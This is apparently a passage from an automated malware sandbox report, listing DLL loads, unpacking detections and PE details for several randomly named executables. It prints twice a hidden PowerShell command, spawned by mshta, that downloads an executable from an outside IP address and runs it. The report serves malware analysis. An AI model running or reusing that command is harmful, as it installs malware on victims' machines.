Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: propsys.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: linkinfo.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntshrui.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: YCL.lnk.16.dr

LNK file: ..\AppData\Local\Temp\5ZzWfENS3ev3FAZfwvRvtJ4wu8d1\Y-Cleaner.exe

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: random.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: random.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: random.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\users\source\repos\Brought\Brought\obj\Release\Brought.pdbL6f6 X6_CorExeMainmscoree.dll source: 9f19f13091.exe, 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp, 9f19f13091.exe, 00000004.00000000.2228824211.0000000000032000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: BitLockerToGo.pdb source: dd662b5386.exe, 0000000E.00000002.2623904415.000000000E388000.00000004.00001000.00020000.00000000.sdmp, dbe8776a6a.exe, 0000000F.00000002.2728858042.000000000E000000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\users\source\repos\Brought\Brought\obj\Release\Brought.pdb source: 9f19f13091.exe, 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp, 9f19f13091.exe, 00000004.00000000.2228824211.0000000000032000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: dd662b5386.exe, 0000000E.00000002.2623904415.000000000E388000.00000004.00001000.00020000.00000000.sdmp, dbe8776a6a.exe, 0000000F.00000002.2728858042.000000000E000000.00000004.00001000.00020000.00000000.sdmp

Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: random.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Unpacked PE file: 11.2.5a20b6327b.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W;dnccwvtb:EW;becnjhyy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dnccwvtb:EW;becnjhyy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Unpacked PE file: 12.2.1e8e57d62a.exe.df0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jiatgfgj:EW;swwymbco:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jiatgfgj:EW;swwymbco:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Unpacked PE file: 14.2.dd662b5386.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ddmefbwf:EW;kzslwcdl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ddmefbwf:EW;kzslwcdl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Unpacked PE file: 15.2.dbe8776a6a.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tkveuiub:EW;tfhtqqdj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tkveuiub:EW;tfhtqqdj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Unpacked PE file: 17.2.186adf2617.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W;utpvtpfy:EW;jrgknaqy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;utpvtpfy:EW;jrgknaqy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Unpacked PE file: 19.2.43a79b4335.exe.ea0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zapzckdv:EW;yjxxvwfv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zapzckdv:EW;yjxxvwfv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Unpacked PE file: 20.2.186adf2617.exe.8e0000.0.unpack :EW;.rsrc:W;.idata :W;utpvtpfy:EW;jrgknaqy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;utpvtpfy:EW;jrgknaqy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Unpacked PE file: 35.2.43a79b4335.exe.ea0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zapzckdv:EW;yjxxvwfv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zapzckdv:EW;yjxxvwfv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Unpacked PE file: 36.2.cefa09b2a4.exe.430000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ajpgbetr:EW;jqmimmnn:EW;.taggant:EW; vs :ER;.rsrc:W;

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NLDQJWO4P0JKZKGQIFPHKJAJP3FG2MC9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: random[1].exe0.2.dr

Static PE information: 0xE58C227B [Mon Jan 14 16:25:31 2092 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe0.2.dr	Static PE information: real checksum: 0x0 should be: 0x63f89
Source: rapes.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x74722
Source: random[3].exe.2.dr	Static PE information: real checksum: 0x1b2888 should be: 0x1b1e65
Source: 186adf2617.exe.2.dr	Static PE information: real checksum: 0x315f2d should be: 0x3215ba
Source: 1e8e57d62a.exe.2.dr	Static PE information: real checksum: 0x1cf713 should be: 0x1dd532
Source: Bunifu_UI_v1.5.3.dll.16.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
